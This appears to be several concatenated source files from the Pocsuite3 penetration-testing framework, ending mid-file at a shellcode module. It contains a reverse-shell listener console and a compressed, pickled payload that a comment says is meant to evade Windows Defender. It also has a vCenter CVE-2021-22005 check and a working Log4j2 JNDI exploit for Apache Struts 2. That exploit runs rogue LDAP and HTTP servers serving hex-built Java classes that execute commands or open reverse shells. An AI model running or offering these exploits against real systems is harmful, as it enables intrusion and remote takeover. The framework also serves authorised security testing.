                time.sleep(0.05)
                ret += get_unicode(client.conn.recv(65536))
            else:
                if ret:
                    if read_again:
                        read_again = False
                        continue
                    break
                elif count > timeout:
                    ret = "Command has no result or filtered by firewall\n"
                else:
                    data_to_stdout('.')
                    read_again = False
                    time.sleep(1)
                    count += 1

    if ret and not ret.startswith('\r'):
        ret = "\r{0}".format(ret)
    if ret and not ret.endswith('\n'):
        ret = "{0}\n".format(ret)

    return ret


def print_cmd_help():
    msg = "-----   Help Menu  -----\n"
    msg += "command      description\n"
    msg += "list         list connected clients\n"
    msg += "select       select which client to send command\n"
    msg += "quit         quit shell\n"
    msg += "help         print help information\n"
    data_to_stdout(msg)


def handle_listener_connection_for_console(wait_time=3, try_count=3):
    while len(kb.data.clients) == 0:
        try:
            time.sleep(wait_time)
        except KeyboardInterrupt:
            break

    if len(kb.data.clients) > 0:
        cmd = "select 0"
        client = get_client(cmd)
        if client is not None:
            send_shell_commands_for_console(client)


def handle_listener_connection():
    _ = ["list", "select", "exit", "quit", "clear"]
    auto_completion(AUTOCOMPLETE_TYPE.POCSUITE, commands=_)

    while True:
        try:
            cmd = None
            cmd = input('shell>: ').strip()
            if not cmd:
                continue
            elif cmd.lower() in ("?", "help"):
                print_cmd_help()
            elif cmd.lower() == "clear":
                clear_history()
                data_to_stdout("[i] history cleared\n")
                save_history(AUTOCOMPLETE_TYPE.POCSUITE)
            elif cmd.lower() in ("x", "q", "exit", "quit"):
                raise PocsuiteShellQuitException
            elif cmd == "list":
                list_clients()
            elif cmd.lower().split(" ")[0] in ('select', 'use'):
                client = get_client(cmd)
                if client is not None:
                    send_shell_commands(client)
            else:
                save_history(AUTOCOMPLETE_TYPE.POCSUITE)
                load_history(AUTOCOMPLETE_TYPE.POCSUITE)
                data_to_stdout("Command Not Found... type ? for help.\n")

        except KeyboardInterrupt:
            logger.warn('Interrupt: use the \'quit\' command to quit')
            continue


class REVERSE_PAYLOAD:
    # Evading Windows Defender
    # Pocsuite3 is an open source security tool, not virus.
    # I believe that this is a false positive of your antivirus tool :)
    payload = (
        b'eJyVV19z20QQLzTQTqevPMLcaFRLAll2HFzAijwkrksCxvbYLm0n43Fl+ZSI2JLQ'
        b'nZuY2DPwrkfxyAsfgC/D8MKX4Cuwe5Icx6R0cGak097e7m/39l9+2vnl4uEd8Vsl'
        b'avxuu5HEzWhGSnwWllxzdu56bpB/OTbPlsvS2PNL7IwUPVKpF3aXvkOuyitytbsi'
        b'9ZQlie+2G5Uk/gC2ipTkBzIusbuXxLugq+imUkNQ5weT7IOEpFAgG3LLKT2J3zs8'
        b'6B+Vk/ijVH+9QEoT+rrEnbAEvCXBC5iSeAcZk1gd28jpEOW/DyiZaAD9eOtI4ZSb'
        b'BXsWmrecXO+hgPcHzVa7OUjiARoWbVh27chwubxpqMnp1Kf82tL9jC932m49t32n'
        b'2+y1kvjPkEZTdKsyZ5T0A+ecclP2LAlESKYcWiDGZIKs9vXu09ExgNL7ncY3o/6g'
        b'1zz4Vj+lPIwCHowXvj2jqgQmSZpmeq7qBL5PHTyHAuzJJBp5viqHugcYRzYP4MPT'
        b'4Hd1FYTUV/uDJ8dtXaoX+pJm5pTOs8E2qdnr5SR6SR1Vuo4hIK1WJrqv+3Jw1Gkn'
        b'8V/hgp8FvrgCbxYGESepOTqbjwG4QxnTA2YyKyUbmbHZ10Fmcfa5YbhmMiO3UBXu'
        b'0sFXYHnAjMk8rKjMcL0p9QNV08uaSW4h795OrmhmaF2jMxx7OlVPcislXQI7hxpa'
        b'ebd71E3iJ+FZCCFCFBlRWi4+ha+uUf3LUWS/sAfxu4dJtycJYTu9Z4cvk/jHaD5e'
        b'gLjUYhEa9NLjxHOJG0TnpmMNGt00UAyfXmRKJNACYi7OwAjVmU0sx4DAYJp53DFC'
        b'AQaIuhRJcNlLL1g6Rhh5PkgNjIjak9WK+hPE8PXBdwdJ/GtELNKb+9ybUZSTLVXt'
        b'QQgbkSGsyTyCCYY+ceCBdFLdr2/nlig4+4UqWRKBkKBOMoU4NMkkIDKu0BNVcEkV'
        b'ST6VhsRmpM8B5enJEBQbF7bHnwaRqiXxg27nebPXP2q2WsmLv9+5c0d2ph4FcyzS'
        b'phfFzvh7iArSXzBOZ0Yb40b4ixnguobgVBWApqR3IzMOeGZwOBNjfEV5X9BUzTwZ'
        b'Lzg9GQ5lfDNgKhvG42p1r7p8dAUyVpnPIZVQQCrK6IF9anpCJ2WdpEujRf1TfqZp'
        b'pAj2luEqTHlicxsOqhu4i4NFSNuQzLkFA3oJmdBvHB83fSeYgEe0DCIsczWoxUNj'
        b'4CbHtnOOQj16SVINWNvB+505L6bHyAZrRSDPz31ClG6fKPBWw4uJZnRtfobEOlGy'
        b'I6APpZ9wxEUzSMNaTUAU0A4RknqtYO1k43nkcaqu5QDs9Tp3z5r36XTOzlQNfJxf'
        b'TGMaMIoRcK/Tbbb7faigP2/WZ3ajPrMb9ZlBfd5MwIwouh5mCGNTwkZZIBV/mHuY'
        b'fVmFwYpeg2CpZ1pu6AQ0UAdGiObFQwjGdTlw+CW3UltGIAjdNXLgCxxwIoE6yaqf'
        b'SK9p5LmLUUhpBN+uPWVU3ySOsKznO8NhnuMys77MRKeVIkOuouBaqZQBlnSZRn6A'
        b'T+DW98p6Wj1HjdZxsz0YNTrtdrMx0AVW7ASZ9KnlYv0ANUgU+S5PdTmAywksqOPT'
        b'YAK95oGUkQwL1qYbzsURQVzBTymI8eDTdHjIu+L1EJH1aRgfDtd9urxf2P1srygq'
        b'JoHVLdUEOAUTVAt8VsQLqte9tGdj278xjZB/jyPbjTpvy4C2msTd/9PzNyebN/f7'
        b'u61nUFj/mM5ttF+aBtBVCLMiCoEWUVVJL1HRzHSHWzZjNII+aIDlKrQ1Xsu73Ubp'
        b'Sqspj+YU62h6NNIvLV6LqEO915ArmUA3FwgVP20Ika5Eipbvj/N9t4bFWVU+thWh'
        b'FbNTHUMH8yemW3PSBEQ02UpK4vs4y4j4j3+7Mc8cd2q1tPTCu9/CeUb0MGxoOkwo'
        b'cgjB41hbbMU69rUuxP4BzCxWXVrHMmyOstSYQQBa9XKeDmzBBGzZ0WVP/3z3iwrG'
        b'LVAv0nrj6K9k7xVGJQ6H2GkhSpztVqu4G811q4UbPBh5aVQy0TvdrX7+aALxCI8K'
        b'PiXdxT8NtN1Hbal3ft9SGOV155Yu34EtOCQ8Ih4bPf/NE4CWz0RvGQXQGvb2eeB+'
        b'u3EwSLF/6GMT3/gHoFhE5Pm/AXPjH5hWGLM='
    )
    vars().update(pickle.loads(zlib.decompress(base64.b64decode(payload))))
    del payload


if __name__ == "__main__":
    start_listener()



#! /usr/bin/env python3
# coding:utf-8

from pocsuite3.api import Output, POCBase, register_poc, requests, logger


class TestPOC(POCBase):
    vulID = '99359'  # ssvid
    version = '2.0'
    author = ['seebug']
    vulDate = '2021-09-22'
    createDate = '2021-09-23'
    updateDate = '2021-09-23'
    references = ['https://www.seebug.org/vuldb/ssvid-99359', 'https://mp.weixin.qq.com/s/UcH-IOUOtO6rsWWetc6O-A']
    name = 'VMware vCenter Server 文件上传漏洞（CVE-2021-22005）检测脚本'
    appPowerLink = 'https://www.vmware.com'
    appName = 'VMware vCenter Server'
    appVersion = 'version < 7.0 U2c、version < 6.7 U3o'
    vulType = 'File Upload'
    desc = '''攻击者可构造恶意请求，通过vCenter中的Analytics服务上传恶意文件导致远程代码执行漏洞。该漏洞被分配编号CVE-2021-22005。
    知道创宇云安全已支持该漏洞检测'''
    dork = {'zoomeye': 'app:"VMware vCenter"'}
    suricata_request = ''''''
    suricata_response = ''''''
    samples = ['']
    install_requires = ['']

    def _check(self):
        self.url = self.url.rstrip('/')
        try:
            rep = requests.post(self.url + "/analytics/telemetry/ph/api/hyper/send?_c&_i=test",
                                headers={"Content-Type": "application/json"}, data="lorem ipsum")
            if rep.status_code == 201:
                return True

            headers = {
                "Accept-Encoding": "gzip, deflate",
                "X-Deployment-Secret": "abc",
                "accept": "application/vapi",
                "Connection": "keep-alive",
                "Content-Type": "application/json",
            }
            rep = requests.post(self.url + "/analytics/ph/api/dataapp/agent?_c=test&_i=1", headers=headers, data="{}")

            if rep.status_code == 201:
                return True

            headers["Connection"] = "close"
            rep = requests.post(self.url + "/analytics/ph/api/dataapp/agent?action=collect&_c=test&_i=1",
                                headers=headers,
                                data="{}")
            if rep.status_code == 200:
                return True
        except Exception as e:
            logger.error(e)

    def _verify(self):
        result = {}
        if self._check():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(TestPOC)



import binascii
import hashlib
import json
import random
import socket
import socketserver
import threading
import time
from http.server import BaseHTTPRequestHandler
from urllib.parse import parse_qs, urljoin

from pocsuite3.api import (
    Output, POCBase, register_poc, get_listener_ip, requests, get_listener_port)
from pocsuite3.lib.core.common import get_host_ip
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.enums import VUL_TYPE, POC_CATEGORY
from pocsuite3.lib.utils import random_str
from pocsuite3.modules.httpserver import PHTTPServer


class Attribute(object):
    def __init__(self, name, values):
        self.name = name
        self.values = values

    def write_to(self, buffer):
        attr_sequence = buffer.begin_sequence()
        buffer.add_octet_string(self.name)
        value_set = buffer.begin_set()

        for value in self.values:
            buffer.add_element(value)

        value_set.end()
        attr_sequence.end()


class ASN1Element(object):
    def __init__(self, type):
        self.type = type

    @staticmethod
    def encode_length_to(length, buffer):
        if ((length & 127) == length):
            buffer.append(length)
        elif ((length & 255) == length):
            buffer.append(-127 % 256)
            buffer.append(length & 255)
        elif ((length & 65535) == length):
            buffer.append(-126 % 256)
            buffer.append(length >> 8 & 255)
            buffer.append(length & 255)
        elif ((length & 16777215) == length):
            buffer.append(-125 % 256)
            buffer.append(length >> 16 & 255)
            buffer.append(length >> 8 & 255)
            buffer.append(length & 255)
        else:
            buffer.append(-124 % 256)
            buffer.append(length >> 24 & 255)
            buffer.append(length >> 16 & 255)
            buffer.append(length >> 8 & 255)
            buffer.append(length & 255)


class ASN1OctetString(ASN1Element):
    def __init__(self, value):
        super().__init__(4)
        self.type = 4
        self.valueBytes = list(value.encode("utf-8"))
        self.length = len(self.valueBytes)

    def encode_to(self, buffer):
        buffer.append(self.type)
        self.encode_length_to(self.length, buffer)
        buffer.extend(self.valueBytes)


class ASN1BufferSet(object):
    def __init__(self, buffer):
        self.buffer = buffer
        self.value_start_pos = buffer.length()

    def end(self):
        self.buffer.end_sequence_or_set(self.value_start_pos)


class ASN1BufferSequence(object):
    def __init__(self, buffer):
        self.buffer = buffer
        self.value_start_pos = buffer.length()

    def end(self):
        self.buffer.end_sequence_or_set(self.value_start_pos)


class ASN1Buffer(object):
    def __init__(self, max_buffer_size=1048576):
        self.maxBufferSize = max_buffer_size
        self.buffer = []

    def get_byte_data(self):
        return bytes(self.buffer)

    def begin_sequence(self, type=48):
        self.buffer.append(type)
        return ASN1BufferSequence(self)

    def begin_set(self, type=49):
        self.buffer.append(type)
        return ASN1BufferSet(self)

    def add_integer(self, int_value, type=2):
        self.buffer.append(type)
        if (int_value < 0):
            if ((int_value & -128) == -128):
                self.buffer.append(1)
                self.buffer.append(int_value & 255)
            elif ((int_value & -32768) == -32768):
                self.buffer.append(2)
                self.buffer.append(int_value >> 8 & 255)
                self.buffer.append(int_value & 255)
            elif ((int_value & -8388608) == -8388608):
                self.buffer.append(3)
                self.buffer.append(int_value >> 16 & 255)
                self.buffer.append(int_value >> 8 & 255)
                self.buffer.append(int_value & 255)
            else:
                self.buffer.append(4)
                self.buffer.append(int_value >> 24 & 255)
                self.buffer.append(int_value >> 16 & 255)
                self.buffer.append(int_value >> 8 & 255)
                self.buffer.append(int_value & 255)
        elif ((int_value & 127) == int_value):
            self.buffer.append(1)
            self.buffer.append(int_value & 127)
        elif ((int_value & 32767) == int_value):
            self.buffer.append(2)
            self.buffer.append(int_value >> 8 & 127)
            self.buffer.append(int_value & 255)
        elif ((int_value & 8388607) == int_value):
            self.buffer.append(3)
            self.buffer.append(int_value >> 16 & 127)
            self.buffer.append(int_value >> 8 & 255)
            self.buffer.append(int_value & 255)
        else:
            self.buffer.append(4)
            self.buffer.append(int_value >> 24 & 127)
            self.buffer.append(int_value >> 16 & 255)
            self.buffer.append(int_value >> 8 & 255)
            self.buffer.append(int_value & 255)

    def add_element(self, element):
        element.encode_to(self.buffer)

    def add_octet_string(self, value, type=4):
        self.buffer.append(type)
        if value == None:
            self.buffer.append(0)
        else:
            ASN1Element.encode_length_to(len(value), self.buffer)
            self.buffer.extend(list(value.encode("utf-8")))

    def end_sequence_or_set(self, value_start_pos):
        length = len(self.buffer) - value_start_pos
        if (length == 0):
            self.buffer.append(0)
        else:
            if ((length & 127) == length):
                self.buffer.insert(value_start_pos, length)
            elif ((length & 255) == length):
                self.buffer.insert(value_start_pos, -127 % 256)
                self.buffer.insert(value_start_pos + 1, length & 255)
            elif ((length & 65535) == length):
                self.buffer.insert(value_start_pos, -126 % 256)
                self.buffer.insert(value_start_pos + 1, length >> 8 & 255)
                self.buffer.insert(value_start_pos + 2, length & 255)
            elif ((length & 16777215) == length):
                self.buffer.insert(value_start_pos, -125 % 256)
                self.buffer.insert(value_start_pos + 1, length >> 16 & 255)
                self.buffer.insert(value_start_pos + 2, length >> 8 & 255)
                self.buffer.insert(value_start_pos + 3, length & 255)
            else:
                self.buffer.insert(value_start_pos, -124 % 256)
                self.buffer.insert(value_start_pos + 1, length >> 24 & 255)
                self.buffer.insert(value_start_pos + 2, length >> 16 & 255)
                self.buffer.insert(value_start_pos + 3, length >> 8 & 255)
                self.buffer.insert(value_start_pos + 4, length & 255)

    def length(self):
        return len(self.buffer)


class ProtocolOp(object):
    def __init__(self, dn, attr_list):
        self.dn = dn
        self.attr_list = attr_list

    def write_to(self, buffer):
        op_sequence = buffer.begin_sequence(type=100)
        buffer.add_octet_string(self.dn)
        attr_sequence = buffer.begin_sequence()

        for attr in self.attr_list:
            attr.write_to(buffer)

        attr_sequence.end()
        op_sequence.end()


class LdapMessage(object):
    def __init__(self, message_id, protocol_op):
        self.message_id = message_id
        self.protocol_op = protocol_op

    def write_to(self, buffer):
        messageSequence = buffer.begin_sequence()
        buffer.add_integer(self.message_id)
        self.protocol_op.write_to(buffer)

        messageSequence.end()


class LdapRequestHandler(socketserver.BaseRequestHandler):
    g_conn_pool = []
    success_data = {}
    ldap_ip = None
    ldap_port = None

    def handle(self):
        rec_count = 0
        while True:
            try:
                byte_data = self.request.recv(1024)
                rec_count += 1

                if binascii.b2a_hex(byte_data) == b'300c020101600702010304008000':
                    response_byte = bytes.fromhex("300c02010161070a010004000400")
                    self.request.sendall(response_byte)

                if rec_count == 2:
                    flag = byte_data[9:9 + int(byte_data[8])].decode("utf-8", errors="ignore")
                    logger.info("Ldap receive flag: " + flag)
                    response_byte = self.get_ldap_data(flag)
                    self.request.sendall(response_byte)
                    LdapRequestHandler.success_data[flag] = True

                    self.request.sendall(bytes.fromhex("300c02010265070a010004000400"))
                    self.remove()
                    break
            except:
                self.remove()

    def get_ldap_data(self, dn):
        http_ip = HttpRequestHandler.http_ip
        http_port = HttpRequestHandler.http_port

        attr1 = Attribute("javaClassName", [ASN1OctetString("aaa")])
        attr2 = Attribute("javaCodeBase", [ASN1OctetString("http://{}:{}/".format(http_ip, http_port))])
        attr3 = Attribute("objectClass", [ASN1OctetString("javaNamingReference")])
        attr4 = Attribute("javaFactory", [ASN1OctetString(dn)])
        attr_list = [attr1, attr2, attr3, attr4]

        protocol_op = ProtocolOp(dn, attr_list)
        message_id = 2
        ldap_message = LdapMessage(message_id, protocol_op)

        buffer = ASN1Buffer()
        ldap_message.write_to(buffer)
        return buffer.get_byte_data()

    def finish(self):
        pass

    def setup(self):
        logger.info("receive ldap connection：{}:{}".format(self.client_address[0], self.client_address[1]))
        LdapRequestHandler.g_conn_pool.append(self.request)

    def remove(self):
        if self.request in LdapRequestHandler.g_conn_pool:
            LdapRequestHandler.g_conn_pool.remove(self.request)

    @staticmethod
    def check_success(flag, timeout=5):
        start_time = time.time()
        while time.time() - start_time <= timeout:
            success = LdapRequestHandler.success_data.get(flag)
            if success != None:
                return success


class HttpRequestHandler(BaseHTTPRequestHandler):
    http_ip = None
    http_port = None
    success_data = {}

    cache_class = {}

    def do_GET(self):
        status = 200

        path_str = self.path
        if path_str.startswith("/AUTO"):
            logger.info("Http send class: " + path_str)
            class_name = path_str.strip("/").strip().split(".")[0]
            class_byte = HttpRequestHandler.cache_class[class_name]
            self.send_response(status)
            self.send_header('Content-Type', 'application/octet-stream')
            self.send_header("Content-Length", str(len(class_byte)))
            self.end_headers()
            self.wfile.write(class_byte)

    def general_class(self, type, command, class_name):
        class_hex = ""
        if type == "exec":
            class_hex1 = "CAFEBABE000000330058010024"
            class_hex2 = binascii.b2a_hex(class_name.encode()).decode()

            class_hex3 = (
                "0700010100106A6176612F6C616E672F4F626A6563740700030100146A6176612F696F2F53657269616C697A61626"
                "C650700050100063C696E69743E010003282956010004436F64650C000700080A0004000A0100083C636C696E6974"
                "3E0100106A6176612F6C616E672F537472696E6707000D0100135B4C6A6176612F6C616E672F537472696E673B070"
                "00F0100186A6176612F6C616E672F50726F636573734275696C6465720700110100116A6176612F6C616E672F5072"
                "6F636573730700130100116A6176612F7574696C2F5363616E6E65720700150100136A6176612F6C616E672F54687"
                "26F7761626C6507001701000D537461636B4D61705461626C6501000B476F74204E6F7468696E6708001A01")

            class_hex4 = "%04x" % len(command)
            class_hex5 = binascii.b2a_hex(command.encode()).decode()
            class_hex6 = ("08001C01000C6A6176612F696F2F46696C6507001E01000D736570617261746F7243686172010001430C"
                          "0020002109001F002201000776616C75654F660100152843294C6A6176612F6C616E672F537472696E67"
                          "3B0C002400250A000E00260100015C080028010006657175616C73010015284C6A6176612F6C616E672F"
                          "4F626A6563743B295A0C002A002B0A000E002C010005285B4229560C0007002E0A000E002F010015284C"
                          "6A6176612F6C616E672F537472696E673B29560C000700310A000E0032010016285B4C6A6176612F6C61"
                          "6E672F537472696E673B29560C000700340A00120035010005737461727401001528294C6A6176612F6C"
                          "616E672F50726F636573733B0C003700380A0012003901000E676574496E70757453747265616D010017"
                          "28294C6A6176612F696F2F496E70757453747265616D3B0C003B003C0A0014003D010018284C6A617661"
                          "2F696F2F496E70757453747265616D3B29560C0007003F0A001600400100025C4108004201000C757365"
                          "44656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C"
                          "2F5363616E6E65723B0C004400450A001600460100076861734E65787401000328295A0C004800490A00"
                          "16004A0100046E65787401001428294C6A6176612F6C616E672F537472696E673B0C004C004D0A001600"
                          "4E010005636C6F73650C005000080A001600510100136A6176612F6C616E672F457863657074696F6E07"
                          "00530A0054003201000A536F7572636546696C65010029")
            class_hex7 = class_hex2
            class_hex8 = ("2E6A6176610021000200040001000600000002000100070008000100090000001100010001000000052A"
                          "B7000BB1000000000008000C0008000100090000018C000C000A0000012AA70003014C121B4D121D4EB2"
                          "0023B800273A0419041229B6002D990009043605A70006033605150599004806BD000E5903BB000E5906"
                          "BC085903106391545904106D9154590510649154B70030535904BB000E5905BC085903102F9154590410"
                          "439154B700305359052D533A07A7007406BD000E5903BB000E591009BC085903102F9154590410629154"
                          "5905106991545906106E91545907102F9154590810629154591006106191545910071073915459100810"
                          "689154B70030535904BB000E59BB000E5905BC085903102D9154590410639154B70030B700335359052D"
                          "533A07BB0012591907B700363A06013A081906B6003A3A08BB0016591908B6003EB700411243B600473A"
                          "091909B6004B99000B1909B6004FA700042C4D1909B60052BB0054592CB70055BFBF0000000100190000"
                          "0050000803FF001F0005000507000E07000E07000E0000FC000201FB0049FD007000070010FF0037000A"
                          "000507000E07000E07000E0107001207001007001407001600004007000EFF000E000000010700180001"
                          "0056000000020057")
            class_hex = class_hex1 + class_hex2 + class_hex3 + class_hex4 + class_hex5 + class_hex6 + class_hex7 + class_hex8
        elif type == "reverse":
            reverse_ip = command.split(":")[0]
            reverse_port = int(command.split(":")[1])

            class_hex1 = "CAFEBABE00000033007C010024"
            class_hex2 = binascii.b2a_hex(class_name.encode()).decode()

            class_hex3 = "0700010100106A6176612F6C616E672F4F626A65637407000301000A536F7572636546696C65010029"
            class_hex4 = class_hex2

            class_hex5 = ("2E6A61766101000273760100154C6A6176612F696F2F496E70757453747265616D3B010002747001001"
                          "64C6A6176612F696F2F4F757470757453747265616D3B0100063C696E69743E0100032829560C000B00"
                          "0C0A0004000D010004436F646501002E284C6A6176612F696F2F496E70757453747265616D3B4C6A617"
                          "6612F696F2F4F757470757453747265616D3B29560C0007000809000200110C0009000A090002001301"
                          "00146A6176612F696F2F53657269616C697A61626C650700150100106A6176612F6C616E672F5468726"
                          "561640700170A0018000D0100083C636C696E69743E01000C6A6176612F696F2F46696C6507001B0100"
                          "0D736570617261746F7243686172010001430C001D001E09001C001F0100106A6176612F6C616E672F5"
                          "37472696E6707002101000776616C75654F660100152843294C6A6176612F6C616E672F537472696E67"
                          "3B0C002300240A002200250100015C080027010006657175616C73010015284C6A6176612F6C616E672"
                          "F4F626A6563743B295A0C0029002A0A0022002B010007636D642E65786508002D0100072F62696E2F73"
                          "6808002F01000F6A6176612F6E65742F536F636B657407003101")

            class_hex6 = "%04x" % len(reverse_ip)
            class_hex7 = binascii.b2a_hex(reverse_ip.encode()).decode()
            class_hex8 = ("080033010016284C6A6176612F6C616E672F537472696E673B4929560C000B00350A003200360100116"
                          "A6176612F6C616E672F52756E74696D6507003801000A67657452756E74696D6501001528294C6A6176"
                          "612F6C616E672F52756E74696D653B0C003A003B0A0039003C01000465786563010027284C6A6176612"
                          "F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003E003F0A003900"
                          "400100116A6176612F6C616E672F50726F6365737307004201000E676574496E70757453747265616D0"
                          "1001728294C6A6176612F696F2F496E70757453747265616D3B0C004400450A0043004601000F676574"
                          "4F757470757453747265616D01001828294C6A6176612F696F2F4F757470757453747265616D3B0C004"
                          "800490A0032004A0C000B00100A0002004C01000573746172740C004E000C0A0018004F0A003200460A"
                          "0043004A01000D537461636B4D61705461626C6501000372756E0100166A6176612F696F2F427566666"
                          "57265645265616465720700550100196A6176612F696F2F496E70757453747265616D52656164657207"
                          "0057010018284C6A6176612F696F2F496E70757453747265616D3B29560C000B00590A0058005A01001"
                          "3284C6A6176612F696F2F5265616465723B29560C000B005C0A0056005D0100166A6176612F696F2F42"
                          "7566666572656457726974657207005F01001A6A6176612F696F2F4F757470757453747265616D57726"
                          "9746572070061010019284C6A6176612F696F2F4F757470757453747265616D3B29560C000B00630A00"
                          "620064010013284C6A6176612F696F2F5772697465723B29560C000B00660A006000670100057772697"
                          "465010007285B43494929560C0069006A0A0060006B010005666C7573680C006D000C0A0060006E0100"
                          "0472656164010007285B43494929490C007000710A005600720100136A6176612F6C616E672F4578636"
                          "57074696F6E070074010005636C6F73650C0076000C0A005600770A006000770100025B4307007A0021"
                          "00020018000100160002000200070008000000020009000A000000040000000B000C0001000F0000001"
                          "100010001000000052AB70019B1000000000000000B00100001000F0000001B000200030000000F2AB7"
                          "00192A2BB500122A2CB50014B1000000000008001A000C0001000F0000008F000500060000005EA7000"
                          "3014CB20020B800264E2D1228B6002C990009122E4DA7000612304DBB003259123411")
            class_hex9 = "%04x" % reverse_port
            class_hex10 = ("B700373A04B8003D2CB600413A05BB0002591905B600471904B6004BB7004DB60050BB0002591904B6"
                           "00511905B60052B7004DB60050B10000000100530000001F000303FF001700040005000700220000FF"
                           "000200040005070022070022000000010054000C0001000F000000C70005000700000071014C014DBB"
                           "005659BB0058592AB40012B7005BB7005E4CBB006059BB0062592AB40014B70065B700684D112000BC"
                           "054EA7000F2C2D031504B6006C2CB6006F2B2D032DBEB6007359360403A3FFE8A700083A05A700032B"
                           "01A500072BB600782C01A500072CB60079A700083A06A70003B100020004004E005100750056006800"
                           "6B007500010053000000340008FF0033000507000207005607006007007B010000FA000BFF00110003"
                           "0700020700560700600001070075040808420700750400010005000000020006")
            class_hex = class_hex1 + class_hex2 + class_hex3 + class_hex4 + class_hex5 + class_hex6 + class_hex7 + class_hex8 + class_hex9 + class_hex10

        return class_hex

    def do_POST(self):
        status = 200

        path_str = self.path
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length).decode()
        params = parse_qs(post_data)
        params = {key: params[key][0] for key in params}

        command = params.get("command", "whoami")
        type = params.get("type", "exec")

        class_hex = ""
        class_name = "AUTO" + hashlib.md5(random_str().encode()).hexdigest()
        class_name = class_name.upper()
        ret_json = {}
        if path_str == "/commonClass":
            class_hex = self.general_class(type, command, class_name)
            logger.info("Genarate class {}".format(class_name))
            ret_json['result'] = class_name

        HttpRequestHandler.cache_class[class_name] = bytes.fromhex(class_hex)
        ret_json_str = json.dumps(ret_json).encode()

        self.send_response(status)
        self.send_header('Content-Type', 'text/xml')
        self.send_header("Content-Length", str(len(ret_json_str)))
        self.end_headers()
        self.wfile.write(ret_json_str)

    def do_HEAD(self):
        status = 404

        if self.path.endswith('jar'):
            status = 200
        self.send_response(status)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", "0")
        self.end_headers()

    @staticmethod
    def get_target_data(random_str, timeout=10):
        start_time = time.time()
        while time.time() - start_time <= timeout:
            if HttpRequestHandler.success_data.get(random_str):
                return True

    @staticmethod
    def get_usable_port():
        for i in range(100000):
            port = random.randint(1000, 10000)
            s = socket.socket()
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                s.bind(('', port))
            except Exception:
                continue
            s.close()
            return port


class LdapThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):

    def __init__(self, bind_ip="0.0.0.0", bind_port=667, requestHandlerClass=LdapRequestHandler):
        self.bind_ip = bind_ip
        self.bind_port = bind_port
        super().__init__((bind_ip, bind_port), requestHandlerClass)

    @staticmethod
    def get_usable_port():
        for i in range(100000):
            port = random.randint(1000, 10000)
            s = socket.socket()
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                s.bind(('', port))
            except Exception:
                continue
            s.close()
            return port

    def start(self, daemon=True):
        server_thread = threading.Thread(target=self.serve_forever, daemon=daemon)
        server_thread.start()
        logger.info("Starting ldap on: ldap://{}:{}".format(self.bind_ip, self.bind_port))


LdapRequestHandler.ldap_ip = get_host_ip()
LdapRequestHandler.ldap_port = LdapThreadedTCPServer.get_usable_port()
ldap = LdapThreadedTCPServer(bind_ip=LdapRequestHandler.ldap_ip, bind_port=LdapRequestHandler.ldap_port,
                             requestHandlerClass=LdapRequestHandler)
ldap.start(daemon=True)

# 开启http服务
HttpRequestHandler.http_ip = get_host_ip()
HttpRequestHandler.http_port = HttpRequestHandler.get_usable_port()
httpd = PHTTPServer(bind_ip=HttpRequestHandler.http_ip, bind_port=HttpRequestHandler.http_port,
                    requestHandler=HttpRequestHandler)
httpd.start(daemon=True)


class DemoPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'knownsec.com'
    vulDate = '2021-12-16'
    createDate = '2021-12-16'
    updateDate = '2021-12-16'
    references = ['']
    name = 'Apache Struts 2 Log4j2 RCE'
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Apache Struts 2'
    appVersion = ''
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    samples = []
    install_requires = []
    suricata_request = ''''''
    suricata_response = ''''''
    dork = {}
    desc = '''
    Apache Struts 2 Log4j RCE
    '''
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _rce(self):
        flag = random_str()
        vul_url = urljoin(self.url + "/", "$%7Bjndi:ldap:$%7B::-/%7D/{}:{}/{}%7D/".format(LdapRequestHandler.ldap_ip,
                                                                                          LdapRequestHandler.ldap_port,
                                                                                          flag))
        try:
            requests.get(vul_url)
        except Exception as ex:
            logger.error(ex)
        return LdapRequestHandler.check_success(flag)

    def _exec(self, mode, uri):
        ret = ''
        type_ = ''
        command = ''
        remote_vul_url = "http://{}:{}".format(HttpRequestHandler.http_ip, HttpRequestHandler.http_port)
        if mode == 'shell':
            type_ = 'reverse'
            command = "{}:{}".format(get_listener_ip(), get_listener_port())
        if mode == 'attack':
            type_ = 'exec'
            command = self.get_option("command")
        data = {'type': type_, 'command': command}
        if uri == '/commonClass':
            resp = requests.post(urljoin(remote_vul_url, uri), data=data)
            if resp.status_code == 200:
                ret = resp.json().get('result', '')

        vul_url = urljoin(self.url + "/", "$%7Bjndi:ldap:$%7B::-/%7D/{}:{}/{}%7D/".format(LdapRequestHandler.ldap_ip,
                                                                                          LdapRequestHandler.ldap_port,
                                                                                          ret))
        try:
            requests.get(vul_url)
        except Exception as ex:
            logger.error(ex)

    def _verify(self):
        result = {}

        if self._rce():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _attack(self):
        self._exec(mode="attack", uri="/commonClass")

    def _shell(self):
        self._exec(mode="shell", uri="/commonClass")

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


register_poc(DemoPOC)



import os
from platform import system, architecture

from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.enums import SHELLCODE_TYPE, OS, OS_ARCH
from pocsuite3.shellcodes.generator import ShellGenerator
from pocsuite3.shellcodes.encoder import CodeEncoders
from pocsuite3.shellcodes.java import JavaShellCode
from pocsuite3.shellcodes.php import PhpShellCode
from pocsuite3.shellcodes.python import PythonShellCode
from pocsuite3.shellcodes.dotnet import AspxShellCode


class OSShellcodes:
    """
